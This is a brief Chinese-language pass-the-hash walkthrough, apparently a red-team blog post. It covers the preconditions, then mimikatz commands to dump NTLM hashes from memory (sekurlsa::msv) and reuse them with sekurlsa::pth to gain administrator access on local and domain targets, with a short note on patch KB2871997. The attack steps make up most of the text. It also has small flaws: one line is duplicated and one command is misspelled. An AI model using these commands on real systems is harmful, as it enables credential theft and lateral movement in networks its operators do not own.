0x01 漏洞利用條件
1.被pth攻擊的計算機未打補丁(KB2871997)
2.拿到一台域成員主機並且拿到管理員組的域用戶的NTML
2.拿到一台域成員主機並且拿到管理員組的域用戶的NTML
3.對方主機存在相同賬號並且是管理員組成員
0x02 本地用戶NTML進行PTH攻擊
本地用戶利用PTH攻擊的條件
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken
默認設置為0。如果設置為1,則SID為500的管理員也不能通過網絡登錄的方式獲取高權限。
開打mimikatz輸入
log 后續輸出打印日志
privilege::debug 提升權限
sekurlsa::msv 抓取hash
讓后pth 攻擊
sekurlsa::pth /domian:要攻擊的ip /user: 相同的用戶名 /ntlm: NTLM哈希
彈出一個cmd 窗口 直接輸入
可以看到c盤
在看看執行計划
能看到這個可以證明你擁有最高權限了
這是以本地用戶進行的pth攻擊
0x03 域賬戶進行PTH攻擊
依舊如此只是在 domian 換成域控名字
sekurlsa::pth /domain:域控名 /user: 相同的用戶名 /ntlm: NTLM哈希
獲得了最高權限
疑惑的是我的域控已經打了補丁(KB2871997)
然而依舊獲取了最高權限
這是補丁的原理
安裝KB2871997補丁后,其他方面並沒有太多的變化。補丁會給本地賬號添加一個 S-1-5-113 的SID,為管理組中的本地賬號添加一個S-1-5-114的SID,這樣方便通過域策略進行管理,例如從域策略中全面禁止這類賬號的網絡登錄
0x04 參考
https://www.harmj0y.net/blog/redteaming/pass-the-hash
is-dead-long-live-localaccounttokenfilterpolicy/
https://www.anquanke.com/post/id/85995
https://blogs.technet.microsoft.com/secguide/2014/09/02/
blocking-remote-use-of-local-accounts/#comment-2525